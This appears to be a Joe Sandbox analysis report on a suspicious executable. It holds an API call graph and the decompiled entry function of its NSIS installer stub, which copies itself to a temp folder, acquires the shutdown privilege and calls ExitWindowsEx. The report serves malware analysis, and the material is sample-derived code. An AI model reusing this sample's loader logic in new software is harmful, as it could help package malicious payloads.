3044 401859 3045 404fe7 25 API calls 3044->3045 3048 401863 3045->3048 3046 404fe7 25 API calls 3054 401845 3046->3054 3047 405cfb lstrcpynA 3047->3058 3067 402f2e 3048->3067 3051 40188a SetFileTime 3052 40189c FindCloseChangeNotification 3051->3052 3052->3054 3055 4018ad 3052->3055 3053 405d1d 18 API calls 3053->3058 3056 4018b2 3055->3056 3057 4018c5 3055->3057 3059 405d1d 18 API calls 3056->3059 3060 405d1d 18 API calls 3057->3060 3058->3043 3058->3044 3058->3047 3058->3053 3065 401830 3058->3065 3066 4059d2 GetFileAttributesA CreateFileA 3058->3066 3087 405ff6 FindFirstFileA 3058->3087 3090 4059b3 GetFileAttributesA 3058->3090 3093 4055bc 3058->3093 3062 4018ba lstrcatA 3059->3062 3063 4018cd 3060->3063 3062->3063 3064 4055bc MessageBoxIndirectA 3063->3064 3064->3054 3065->3046 3065->3054 3066->3058 3068 402f5b 3067->3068 3069 402f3f SetFilePointer 3067->3069 3097 403059 GetTickCount 3068->3097 3069->3068 3072 402f6c ReadFile 3073 402f8c 3072->3073 3081 401876 3072->3081 3074 403059 43 API calls 3073->3074 3073->3081 3075 402fa3 3074->3075 3076 40301e ReadFile 3075->3076 3079 402fb3 3075->3079 3075->3081 3076->3081 3078 402fce ReadFile 3078->3079 3078->3081 3079->3078 3080 402fe7 WriteFile 3079->3080 3079->3081 3080->3079 3080->3081 3081->3051 3081->3052 3082->3035 3083->3036 3085 401772 lstrcatA 3084->3085 3086 405808 lstrcatA 3084->3086 3085->3035 3086->3085 3088 406017 3087->3088 3089 40600c FindClose 3087->3089 3088->3058 3089->3088 3091 4059c2 SetFileAttributesA 3090->3091 3092 4059cf 3090->3092 3091->3092 3092->3058 3096 4055d1 3093->3096 3094 40561d 3094->3058 3095 4055e5 MessageBoxIndirectA 3095->3094 3096->3094 3096->3095 3098 4031c3 3097->3098 3099 403088 3097->3099 3100 402be9 33 API calls 3098->3100 3110 403207 SetFilePointer 3099->3110 3107 402f64 3100->3107 3102 403093 SetFilePointer 3106 4030b8 3102->3106 3106->3107 3108 40314d WriteFile 3106->3108 3109 4031a4 SetFilePointer 3106->3109 3111 4031d5 ReadFile 3106->3111 3113 406184 3106->3113 3120 402be9 3106->3120 3107->3072 3107->3081 3108->3106 3108->3107 3109->3098 3110->3102 3112 4031f6 3111->3112 3112->3106 3114 4061a9 3113->3114 3115 4061b1 3113->3115 3114->3106 3115->3114 3116 406241 GlobalAlloc 3115->3116 3117 406238 GlobalFree 3115->3117 3118 4062b8 GlobalAlloc 3115->3118 3119 4062af GlobalFree 3115->3119 3116->3114 3116->3115 3117->3116 3118->3114 3118->3115 3119->3118 3121 402bf7 3120->3121 3122 402c0f 3120->3122 3123 402c00 DestroyWindow 3121->3123 3124 402c07 3121->3124 3125 402c17 3122->3125 3126 402c1f GetTickCount 3122->3126 3123->3124 3124->3106 3135 4060c3 3125->3135 3126->3124 3128 402c2d 3126->3128 3129 402c62 CreateDialogParamA ShowWindow 3128->3129 3130 402c35 3128->3130 3129->3124 3130->3124 3139 402bcd 3130->3139 3132 402c43 wsprintfA 3133 404fe7 25 API calls 3132->3133 3134 402c60 3133->3134 3134->3124 3136 4060e0 PeekMessageA 3135->3136 3137 4060f0 3136->3137 3138 4060d6 DispatchMessageA 3136->3138 3137->3124 3138->3136 3140 402bdc 3139->3140 3141 402bde MulDiv 3139->3141 3140->3141 3141->3132 4237 401634 4238 402a0c 18 API calls 4237->4238 4239 40163a 4238->4239 4240 405ff6 2 API calls 4239->4240 4241 401640 4240->4241 4242 401934 4243 4029ef 18 API calls 4242->4243 4244 40193b 4243->4244 4245 4029ef 18 API calls 4244->4245 4246 401945 4245->4246 4247 402a0c 18 API calls 4246->4247 4248 40194e 4247->4248 4249 401961 lstrlenA 4248->4249 4253 40199c 4248->4253 4250 40196b 4249->4250 4250->4253 4255 405cfb lstrcpynA 4250->4255 4252 401985 4252->4253 4254 401992 lstrlenA 4252->4254 4254->4253 4255->4252 4256 4019b5 4257 402a0c 18 API calls 4256->4257 4258 4019bc 4257->4258 4259 402a0c 18 API calls 4258->4259 4260 4019c5 4259->4260 4261 4019cc lstrcmpiA 4260->4261 4262 4019de lstrcmpA 4260->4262 4263 4019d2 4261->4263 4262->4263 4264 404936 GetDlgItem GetDlgItem 4265 40498a 7 API calls 4264->4265 4268 404ba7 4264->4268 4266 404a30 DeleteObject 4265->4266 4267 404a23 SendMessageA 4265->4267 4269 404a3b 4266->4269 4267->4266 4287 404c91 4268->4287 4296 404c1b 4268->4296 4317 4048b6 SendMessageA 4268->4317 4270 404a72 4269->4270 4271 405d1d 18 API calls 4269->4271 4272 403fb7 19 API calls 4270->4272 4275 404a54 SendMessageA SendMessageA 4271->4275 4278 404a86 4272->4278 4273 404d40 4276 404d55 4273->4276 4277 404d49 SendMessageA 4273->4277 4274 404b9a 4280 40401e 8 API calls 4274->4280 4275->4269 4288 404d67 ImageList_Destroy 4276->4288 4289 404d6e 4276->4289 4293 404d7e 4276->4293 4277->4276 4283 403fb7 19 API calls 4278->4283 4279 404cea SendMessageA 4279->4274 4285 404cff SendMessageA 4279->4285 4286 404f30 4280->4286 4281 404c83 SendMessageA 4281->4287 4297 404a94 4283->4297 4284 404ee4 4284->4274 4294 404ef6 ShowWindow GetDlgItem ShowWindow 4284->4294 4291 404d12 4285->4291 4287->4273 4287->4274 4287->4279 4288->4289 4292 404d77 GlobalFree 4289->4292 4289->4293 4290 404b68 GetWindowLongA SetWindowLongA 4295 404b81 4290->4295 4302 404d23 SendMessageA 4291->4302 4292->4293 4293->4284 4301 40140b 2 API calls 4293->4301 4310 404db0 4293->4310 4294->4274 4298 404b87 ShowWindow 4295->4298 4299 404b9f 4295->4299 4296->4281 4296->4287 4297->4290 4300 404ae3 SendMessageA 4297->4300 4303 404b62 4297->4303 4306 404b30 SendMessageA 4297->4306 4307 404b1f SendMessageA 4297->4307 4315 403fec SendMessageA 4298->4315 4316 403fec SendMessageA 4299->4316 4300->4297 4301->4310 4302->4273 4303->4290 4303->4295 4306->4297 4307->4297 4308 404eba InvalidateRect 4308->4284 4309 404ed0 4308->4309 4313 404871 21 API calls 4309->4313 4311 404dde SendMessageA 4310->4311 4312 404df4 4310->4312 4311->4312 4312->4308 4314 404e68 SendMessageA SendMessageA 4312->4314 4313->4284 4314->4312 4315->4274 4316->4268 4318 404915 SendMessageA 4317->4318 4319 4048d9 GetMessagePos ScreenToClient SendMessageA 4317->4319 4321 40490d 4318->4321 4320 404912 4319->4320 4319->4321 4320->4318 4321->4296 4322 402036 4323 402a0c 18 API calls 4322->4323 4324 40203d 4323->4324 4325 402a0c 18 API calls 4324->4325 4326 402047 4325->4326 4327 402a0c 18 API calls 4326->4327 4328 402050 4327->4328 4329 402a0c 18 API calls 4328->4329 4330 40205a 4329->4330 4331 402a0c 18 API calls 4330->4331 4332 402064 4331->4332 4333 402078 CoCreateInstance 4332->4333 4334 402a0c 18 API calls 4332->4334 4335 40214d 4333->4335 4336 402097 4333->4336 4334->4333 4337 401423 25 API calls 4335->4337 4338 40217f 4335->4338 4336->4335 4339 40212c MultiByteToWideChar 4336->4339 4337->4338 4339->4335 4340 404f37 4341 404f45 4340->4341 4342 404f5c 4340->4342 4343 404f4b 4341->4343 4358 404fc5 4341->4358 4344 404f6a IsWindowVisible 4342->4344 4350 404f81 4342->4350 4345 404003 SendMessageA 4343->4345 4347 404f77 4344->4347 4344->4358 4348 404f55 4345->4348 4346 404fcb CallWindowProcA 4346->4348 4349 4048b6 5 API calls 4347->4349 4349->4350 4350->4346 4359 405cfb lstrcpynA 4350->4359 4352 404fb0 4360 405c59 wsprintfA 4352->4360 4354 404fb7 4355 40140b 2 API calls 4354->4355 4356 404fbe 4355->4356 4361 405cfb lstrcpynA 4356->4361 4358->4346 4359->4352 4360->4354 4361->4358 4362 4014b7 4363 4014bd 4362->4363 4364 401389 2 API calls 4363->4364 4365 4014c5 4364->4365 4366 402239 4367 402241 4366->4367 4368 402247 4366->4368 4369 402a0c 18 API calls 4367->4369 4370 402a0c 18 API calls 4368->4370 4372 402257 4368->4372 4369->4368 4370->4372 4371 402265 4374 402a0c 18 API calls 4371->4374 4372->4371 4373 402a0c 18 API calls 4372->4373 4373->4371 4375 40226e WritePrivateProfileStringA 4374->4375 4383 40243d 4384 402b16 19 API calls 4383->4384 4385 402447 4384->4385 4386 4029ef 18 API calls 4385->4386 4387 402450 4386->4387 4388 402473 RegEnumValueA 4387->4388 4389 402467 RegEnumKeyA 4387->4389 4391 402672 4387->4391 4390 40248c RegCloseKey 4388->4390 4388->4391 4389->4390 4390->4391 4393 4022bd 4394 4022c2 4393->4394 4395 4022ed 4393->4395 4396 402b16 19 API calls 4394->4396 4397 402a0c 18 API calls 4395->4397 4398 4022c9 4396->4398 4399 4022f4 4397->4399 4400 402a0c 18 API calls 4398->4400 4403 40230a 4398->4403 4404 402a4c RegOpenKeyExA 4399->4404 4401 4022da RegDeleteValueA RegCloseKey 4400->4401 4401->4403 4405 402a77 4404->4405 4411 402ac3 4404->4411 4406 402a9d RegEnumKeyA 4405->4406 4407 402aaf RegCloseKey 4405->4407 4409 402ad4 RegCloseKey 4405->4409 4412 402a4c 5 API calls 4405->4412 4406->4405 4406->4407 4408 406087 5 API calls 4407->4408 4410 402abf 4408->4410 4409->4411 4410->4411 4413 402aef RegDeleteKeyA 4410->4413 4411->4403 4412->4405 4413->4411

                                              Executed Functions

                                              Function 0040324F Relevance: 84.3, APIs: 26, Strings: 22, Instructions: 313stringfilecomCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 40324f-403283 SetErrorMode GetVersion 1 403285-40328d call 406087 0->1 2 403296-403326 call 40601d * 3 call 406087 * 2 #17 OleInitialize SHGetFileInfoA call 405cfb GetCommandLineA call 405cfb GetModuleHandleA 0->2 1->2 8 40328f 1->8 20 403332-403347 call 405819 CharNextA 2->20 21 403328-40332d 2->21 8->2 24 4033ac-4033b0 20->24 21->20 25 4033b2 24->25 26 403349-40334c 24->26 29 4033c5-4033dd GetTempPathA call 40321e 25->29 27 403354-40335c 26->27 28 40334e-403352 26->28 30 403364-403367 27->30 31 40335e-40335f 27->31 28->27 28->28 38 4033ff-403416 DeleteFileA call 402c88 29->38 39 4033df-4033fd GetWindowsDirectoryA lstrcatA call 40321e 29->39 33 403369-40336d 30->33 34 40339c-4033a9 call 405819 30->34 31->30 36 40337d-403383 33->36 37 40336f-403378 33->37 34->24 51 4033ab 34->51 43 403393-40339a 36->43 44 403385-40338e 36->44 37->36 41 40337a 37->41 53 40347d-40348c ExitProcess OleUninitialize 38->53 54 403418-40341e 38->54 39->38 39->53 41->36 43->34 49 4033b4-4033c0 call 405cfb 43->49 44->43 48 403390 44->48 48->43 49->29 51->24 55 4035a1-4035a7 53->55 56 403492-4034a2 call 4055bc ExitProcess 53->56 57 403420-403429 call 405819 54->57 58 40346d-403474 call 40374e 54->58 60 403644-40364c 55->60 61 4035ad-4035ca call 406087 * 3 55->61 70 403434-403436 57->70 69 403479 58->69 64 403652-403656 ExitProcess 60->64 65 40364e 60->65 88 403614-403622 call 406087 61->88 89 4035cc-4035ce 61->89 65->64 69->53 72 403438-403442 70->72 73 40342b-403431 70->73 76 403444-403451 call 4058cf 72->76 77 4034a8-4034bc call 405543 lstrcatA 72->77 73->72 75 403433 73->75 75->70 76->53 87 403453-403469 call 405cfb * 2 76->87 85 4034c9-4034e3 lstrcatA lstrcmpiA 77->85 86 4034be-4034c4 lstrcatA 77->86 85->53 91 4034e5-4034e8 85->91 86->85 87->58 99 403630-40363b ExitWindowsEx 88->99 100 403624-40362e 88->100 89->88 93 4035d0-4035d2 89->93 95 4034f1 call 405526 91->95 96 4034ea-4034ef call 4054a9 91->96 93->88 98 4035d4-4035e6 GetCurrentProcess 93->98 108 4034f6-403503 SetCurrentDirectoryA 95->108 96->108 98->88 111 4035e8-40360a 98->111 99->60 107 40363d-40363f call 40140b 99->107 100->99 100->107 107->60 109 403510-40352a call 405cfb 108->109 110 403505-40350b call 405cfb 108->110 118 40352f-40354b call 405d1d DeleteFileA 109->118 110->109 111->88 121 40358c-403593 118->121 122 40354d-40355d CopyFileA 118->122 121->118 123 403595-40359c call 405a49 121->123 122->121 124 40355f-40357f call 405a49 call 405d1d call 40555b 122->124 123->53 124->121 133 403581-403588 CloseHandle 124->133 133->121
                                              C-Code - Quality: 77%
                                              			_entry_() {
				intOrPtr _t40;
				CHAR* _t44;
				char* _t47;
				signed int _t49;
				void* _t53;
				intOrPtr _t55;
				int _t56;
				signed int _t59;
				signed int _t60;
				int _t61;
				signed int _t63;
				signed int _t66;
				int _t83;
				void* _t87;
				void* _t99;
				intOrPtr* _t100;
				void* _t103;
				CHAR* _t108;
				signed int _t109;
				signed int _t110;
				signed int _t111;
				void* _t113;
				signed int _t115;
				char* _t117;
				signed int _t118;
				void* _t120;
				void* _t121;
				char _t138;

				 *(_t121 + 0x1c) = 0;
				 *((intOrPtr*)(_t121 + 0x14)) = "Error writing temporary file. Make sure your temp folder is valid.";
				_t110 = 0;
				 *(_t121 + 0x18) = 0x20;
				SetErrorMode(0x8001); // executed
				if(GetVersion() != 6) {
					_t100 = E00406087(0);
					if(_t100 != 0) {
						 *_t100(0xc00);
					}
				}
				E0040601D("UXTHEME"); // executed
				E0040601D("USERENV"); // executed
				E0040601D("SETUPAPI"); // executed
				E00406087(0xd);
				_t40 = E00406087(0xb);
				 *0x423f84 = _t40;
				__imp__#17();
				__imp__OleInitialize(0); // executed
				 *0x424038 = _t40;
				SHGetFileInfoA(0x41f538, 0, _t121 + 0x34, 0x160, 0); // executed
				E00405CFB(0x423780, "NSIS Error");
				_t44 = GetCommandLineA();
				_t117 = "\"C:\\Users\\alfons\\Desktop\\qHpeBvr9cR.exe\"";
				E00405CFB(_t117, _t44);
				 *0x423f80 = GetModuleHandleA(0);
				_t47 = _t117;
				if("\"C:\\Users\\alfons\\Desktop\\qHpeBvr9cR.exe\"" == 0x22) {
					 *((char*)(_t121 + 0x14)) = 0x22;
					_t47 =  &M0042A001;
				}
				_t49 = CharNextA(E00405819(_t47,  *((intOrPtr*)(_t121 + 0x14))));
				 *(_t121 + 0x1c) = _t49;
				while(1) {
					_t103 =  *_t49;
					_t125 = _t103;
					if(_t103 == 0) {
						break;
					}
					__eflags = _t103 - 0x20;
					if(_t103 != 0x20) {
						L8:
						__eflags =  *_t49 - 0x22;
						 *((char*)(_t121 + 0x14)) = 0x20;
						if( *_t49 == 0x22) {
							_t49 = _t49 + 1;
							__eflags = _t49;
							 *((char*)(_t121 + 0x14)) = 0x22;
						}
						__eflags =  *_t49 - 0x2f;
						if( *_t49 != 0x2f) {
							L18:
							_t49 = E00405819(_t49,  *((intOrPtr*)(_t121 + 0x14)));
							__eflags =  *_t49 - 0x22;
							if(__eflags == 0) {
								_t49 = _t49 + 1;
								__eflags = _t49;
							}
							continue;
						} else {
							_t49 = _t49 + 1;
							__eflags =  *_t49 - 0x53;
							if( *_t49 == 0x53) {
								__eflags = ( *(_t49 + 1) | 0x00000020) - 0x20;
								if(( *(_t49 + 1) | 0x00000020) == 0x20) {
									_t110 = _t110 | 0x00000002;
									__eflags = _t110;
								}
							}
							__eflags =  *_t49 - 0x4352434e;
							if( *_t49 == 0x4352434e) {
								__eflags = ( *(_t49 + 4) | 0x00000020) - 0x20;
								if(( *(_t49 + 4) | 0x00000020) == 0x20) {
									_t110 = _t110 | 0x00000004;
									__eflags = _t110;
								}
							}
							__eflags =  *((intOrPtr*)(_t49 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t49 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t49 - 2)) = 0;
								__eflags = _t49 + 2;
								E00405CFB("C:\\Users\\alfons\\AppData\\Local\\Temp", _t49 + 2);
								L23:
								_t108 = "C:\\Users\\alfons\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t108);
								_t53 = E0040321E(_t125);
								_t126 = _t53;
								if(_t53 != 0) {
									L25:
									DeleteFileA("1033"); // executed
									_t55 = E00402C88(_t127, _t110); // executed
									 *((intOrPtr*)(_t121 + 0x10)) = _t55;
									if(_t55 != 0) {
										L35:
										ExitProcess(); // executed
										__imp__OleUninitialize(); // executed
										_t134 =  *((intOrPtr*)(_t121 + 0x10));
										if( *((intOrPtr*)(_t121 + 0x10)) == 0) {
											__eflags =  *0x424014;
											if( *0x424014 == 0) {
												L62:
												_t56 =  *0x42402c;
												__eflags = _t56 - 0xffffffff;
												if(_t56 != 0xffffffff) {
													 *(_t121 + 0x18) = _t56;
												}
												ExitProcess( *(_t121 + 0x18));
											}
											_t118 = E00406087(5);
											_t111 = E00406087(6);
											_t59 = E00406087(7);
											__eflags = _t118;
											_t109 = _t59;
											if(_t118 != 0) {
												__eflags = _t111;
												if(_t111 != 0) {
													__eflags = _t109;
													if(_t109 != 0) {
														_t66 =  *_t118(GetCurrentProcess(), 0x28, _t121 + 0x1c);
														__eflags = _t66;
														if(_t66 != 0) {
															 *_t111(0, "SeShutdownPrivilege", _t121 + 0x24);
															 *(_t121 + 0x38) = 1;
															 *(_t121 + 0x44) = 2;
															 *_t109( *((intOrPtr*)(_t121 + 0x30)), 0, _t121 + 0x28, 0, 0, 0);
														}
													}
												}
											}
											_t60 = E00406087(8);
											__eflags = _t60;
											if(_t60 == 0) {
												L60:
												_t61 = ExitWindowsEx(2, 0x80040002);
												__eflags = _t61;
												if(_t61 != 0) {
													goto L62;
												}
												goto L61;
											} else {
												_t63 =  *_t60(0, 0, 0, 0x25, 0x80040002);
												__eflags = _t63;
												if(_t63 == 0) {
													L61:
													E0040140B(9);
													goto L62;
												}
												goto L60;
											}
										}
										E004055BC( *((intOrPtr*)(_t121 + 0x14)), 0x200010);
										ExitProcess(2);
									}
									if( *0x423f9c == 0) {
										L34:
										 *0x42402c =  *0x42402c | 0xffffffff;
										 *(_t121 + 0x18) = E0040374E( *0x42402c);
										goto L35;
									}
									_t115 = E00405819(_t117, 0);
									while(_t115 >= _t117) {
										__eflags =  *_t115 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t115 = _t115 - 1;
										__eflags = _t115;
									}
									_t131 = _t115 - _t117;
									 *((intOrPtr*)(_t121 + 0x10)) = "Error launching installer";
									if(_t115 < _t117) {
										_t113 = E00405543(_t134);
										lstrcatA(_t108, "~nsu");
										if(_t113 != 0) {
											lstrcatA(_t108, "A");
										}
										lstrcatA(_t108, ".tmp");
										_t119 = "C:\\Users\\alfons\\Desktop";
										if(lstrcmpiA(_t108, "C:\\Users\\alfons\\Desktop") != 0) {
											_push(_t108);
											if(_t113 == 0) {
												E00405526();
											} else {
												E004054A9();
											}
											SetCurrentDirectoryA(_t108);
											_t138 = "C:\\Users\\alfons\\AppData\\Local\\Temp"; // 0x43
											if(_t138 == 0) {
												E00405CFB("C:\\Users\\alfons\\AppData\\Local\\Temp", _t119);
											}
											E00405CFB(0x425000,  *(_t121 + 0x1c));
											 *0x425400 = 0x41;
											_t120 = 0x1a;
											do {
												E00405D1D(0, _t108, 0x41f138, 0x41f138,  *((intOrPtr*)( *0x423f90 + 0x120)));
												DeleteFileA(0x41f138);
												if( *((intOrPtr*)(_t121 + 0x10)) != 0) {
													_t83 = CopyFileA("C:\\Users\\alfons\\Desktop\\qHpeBvr9cR.exe", 0x41f138, 1);
													_t140 = _t83;
													if(_t83 != 0) {
														_push(0);
														_push(0x41f138);
														E00405A49(_t140);
														E00405D1D(0, _t108, 0x41f138, 0x41f138,  *((intOrPtr*)( *0x423f90 + 0x124)));
														_t87 = E0040555B(0x41f138);
														if(_t87 != 0) {
															CloseHandle(_t87);
															 *((intOrPtr*)(_t121 + 0x10)) = 0;
														}
													}
												}
												 *0x425400 =  *0x425400 + 1;
												_t120 = _t120 - 1;
												_t142 = _t120;
											} while (_t120 != 0);
											_push(0);
											_push(_t108);
											E00405A49(_t142);
										}
										goto L35;
									}
									 *_t115 = 0;
									_t116 = _t115 + 4;
									if(E004058CF(_t131, _t115 + 4) == 0) {
										goto L35;
									}
									E00405CFB("C:\\Users\\alfons\\AppData\\Local\\Temp", _t116);
									E00405CFB("C:\\Users\\alfons\\AppData\\Local\\Temp", _t116);
									 *((intOrPtr*)(_t121 + 0x10)) = 0;
									goto L34;
								}
								GetWindowsDirectoryA(_t108, 0x3fb);
								lstrcatA(_t108, "\\Temp");
								_t99 = E0040321E(_t126);
								_t127 = _t99;
								if(_t99 == 0) {
									goto L35;
								}
								goto L25;
							} else {
								goto L18;
							}
						}
					} else {
						goto L7;
					}
					do {
						L7:
						_t49 = _t49 + 1;
						__eflags =  *_t49 - 0x20;
					} while ( *_t49 == 0x20);
					goto L8;
				}
				goto L23;
			}































                                              0x00403260
                                              0x00403264
                                              0x0040326c
                                              0x0040326e
                                              0x00403273
                                              0x00403283
                                              0x00403286
                                              0x0040328d
                                              0x00403294
                                              0x00403294
                                              0x0040328d
                                              0x0040329b
                                              0x004032a5
                                              0x004032af
                                              0x004032b6
                                              0x004032bd
                                              0x004032c2
                                              0x004032c7
                                              0x004032ce
                                              0x004032d4
                                              0x004032ea
                                              0x004032fa
                                              0x004032ff
                                              0x00403305
                                              0x0040330c
                                              0x0040331f
                                              0x00403324
                                              0x00403326
                                              0x00403328
                                              0x0040332d
                                              0x0040332d
                                              0x0040333d
                                              0x00403343
                                              0x004033ac
                                              0x004033ac
                                              0x004033ae
                                              0x004033b0
                                              0x00000000
                                              0x00000000
                                              0x00403349
                                              0x0040334c
                                              0x00403354
                                              0x00403354
                                              0x00403357
                                              0x0040335c
                                              0x0040335e
                                              0x0040335e
                                              0x0040335f
                                              0x0040335f
                                              0x00403364
                                              0x00403367
                                              0x0040339c
                                              0x004033a1
                                              0x004033a6
                                              0x004033a9
                                              0x004033ab
                                              0x004033ab
                                              0x004033ab
                                              0x00000000
                                              0x00403369
                                              0x00403369
                                              0x0040336a
                                              0x0040336d
                                              0x00403375
                                              0x00403378
                                              0x0040337a
                                              0x0040337a
                                              0x0040337a
                                              0x00403378
                                              0x0040337d
                                              0x00403383
                                              0x0040338b
                                              0x0040338e
                                              0x00403390
                                              0x00403390
                                              0x00403390
                                              0x0040338e
                                              0x00403393
                                              0x0040339a
                                              0x004033b4
                                              0x004033b7
                                              0x004033c0
                                              0x004033c5
                                              0x004033c5
                                              0x004033d0
                                              0x004033d6
                                              0x004033db
                                              0x004033dd
                                              0x004033ff
                                              0x00403404
                                              0x0040340b
                                              0x00403412
                                              0x00403416
                                              0x0040347d
                                              0x0040347d
                                              0x00403482
                                              0x00403488
                                              0x0040348c
                                              0x004035a1
                                              0x004035a7
                                              0x00403644
                                              0x00403644
                                              0x00403649
                                              0x0040364c
                                              0x0040364e
                                              0x0040364e
                                              0x00403656
                                              0x00403656
                                              0x004035b6
                                              0x004035bf
                                              0x004035c1
                                              0x004035c6
                                              0x004035c8
                                              0x004035ca
                                              0x004035cc
                                              0x004035ce
                                              0x004035d0
                                              0x004035d2
                                              0x004035e2
                                              0x004035e4
                                              0x004035e6
                                              0x004035f3
                                              0x00403602
                                              0x0040360a
                                              0x00403612
                                              0x00403612
                                              0x004035e6
                                              0x004035d2
                                              0x004035ce
                                              0x00403616
                                              0x0040361b
                                              0x00403622
                                              0x00403630
                                              0x00403633
                                              0x00403639
                                              0x0040363b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00403624
                                              0x0040362a
                                              0x0040362c
                                              0x0040362e
                                              0x0040363d
                                              0x0040363f
                                              0x00000000
                                              0x0040363f
                                              0x00000000
                                              0x0040362e
                                              0x00403622
                                              0x0040349b
                                              0x004034a2
                                              0x004034a2
                                              0x0040341e
                                              0x0040346d
                                              0x0040346d
                                              0x00403479
                                              0x00000000
                                              0x00403479
                                              0x00403427
                                              0x00403434
                                              0x0040342b
                                              0x00403431
                                              0x00000000
                                              0x00000000
                                              0x00403433
                                              0x00403433
                                              0x00403433
                                              0x00403438
                                              0x0040343a
                                              0x00403442
                                              0x004034b3
                                              0x004034b5
                                              0x004034bc
                                              0x004034c4
                                              0x004034c4
                                              0x004034cf
                                              0x004034d4
                                              0x004034e3
                                              0x004034e7
                                              0x004034e8
                                              0x004034f1
                                              0x004034ea
                                              0x004034ea
                                              0x004034ea
                                              0x004034f7
                                              0x004034fd
                                              0x00403503
                                              0x0040350b
                                              0x0040350b
                                              0x00403519
                                              0x00403520
                                              0x00403529
                                              0x0040352f
                                              0x0040353b
                                              0x00403541
                                              0x0040354b
                                              0x00403555
                                              0x0040355b
                                              0x0040355d
                                              0x0040355f
                                              0x00403560
                                              0x00403561
                                              0x00403572
                                              0x00403578
                                              0x0040357f
                                              0x00403582
                                              0x00403588
                                              0x00403588
                                              0x0040357f
                                              0x0040355d
                                              0x0040358c
                                              0x00403592
                                              0x00403592
                                              0x00403592
                                              0x00403595
                                              0x00403596
                                              0x00403597
                                              0x00403597
                                              0x00000000
                                              0x004034e3
                                              0x00403444
                                              0x00403446
                                              0x00403451
                                              0x00000000
                                              0x00000000
                                              0x00403459
                                              0x00403464
                                              0x00403469
                                              0x00000000
                                              0x00403469
                                              0x004033e5
                                              0x004033f1
                                              0x004033f6
                                              0x004033fb
                                              0x004033fd
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0040339a
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0040334e
                                              0x0040334e
                                              0x0040334e
                                              0x0040334f
                                              0x0040334f
                                              0x00000000
                                              0x0040334e
                                              0x00000000

                                              APIs
                                              • SetErrorMode.KERNELBASE ref: 00403273
                                              • GetVersion.KERNEL32 ref: 00403279
                                              • #17.COMCTL32(0000000B,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 004032C7
                                              • OleInitialize.OLE32(00000000), ref: 004032CE
                                              • SHGetFileInfoA.SHELL32(0041F538,00000000,?,00000160,00000000), ref: 004032EA
                                              • GetCommandLineA.KERNEL32(00423780,NSIS Error), ref: 004032FF
                                              • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\qHpeBvr9cR.exe",00000000), ref: 00403312
                                              • CharNextA.USER32(00000000,"C:\Users\user\Desktop\qHpeBvr9cR.exe",00409130), ref: 0040333D
                                              • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004033D0
                                              • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004033E5
                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033F1
                                              • DeleteFileA.KERNELBASE(1033), ref: 00403404
                                                • Part of subcall function 00406087: GetModuleHandleA.KERNEL32(?,?,00000000,004032BB,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 00406099
                                                • Part of subcall function 00406087: GetProcAddress.KERNEL32(00000000,?), ref: 004060B4
                                              • ExitProcess.KERNEL32(00000000), ref: 0040347D
                                              • OleUninitialize.OLE32(00000000), ref: 00403482
                                              • ExitProcess.KERNEL32 ref: 004034A2
                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\qHpeBvr9cR.exe",00000000,00000000), ref: 004034B5
                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,004091AC,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\qHpeBvr9cR.exe",00000000,00000000), ref: 004034C4
                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\qHpeBvr9cR.exe",00000000,00000000), ref: 004034CF
                                              • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\qHpeBvr9cR.exe",00000000,00000000), ref: 004034DB
                                              • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004034F7
                                              • DeleteFileA.KERNEL32(0041F138,0041F138,?,00425000,?), ref: 00403541
                                              • CopyFileA.KERNEL32(C:\Users\user\Desktop\qHpeBvr9cR.exe,0041F138,00000001), ref: 00403555
                                              • CloseHandle.KERNEL32(00000000,0041F138,0041F138,?,0041F138,00000000), ref: 00403582
                                              • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000006,00000005), ref: 004035DB
                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403633
                                              • ExitProcess.KERNEL32 ref: 00403656
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
